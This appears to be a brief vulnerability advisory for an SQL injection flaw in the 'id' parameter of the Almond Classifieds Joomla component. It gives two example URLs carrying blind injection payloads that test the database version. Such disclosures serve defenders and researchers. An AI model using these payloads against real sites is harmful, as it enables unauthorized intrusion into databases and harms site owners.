Almond Classifieds for Joomla! 'id' Parameter SQL Injection Vulnerability

Almond Classifieds for Joomla! 'id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/[path]/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=6468+and+substring(@@version,1,1)=5
http://www.example.com/[path]/index.php?option=com_aclassf&Itemid=26&ct=merch5&md=details&id=6468+and+substring(@@version,1,1)=4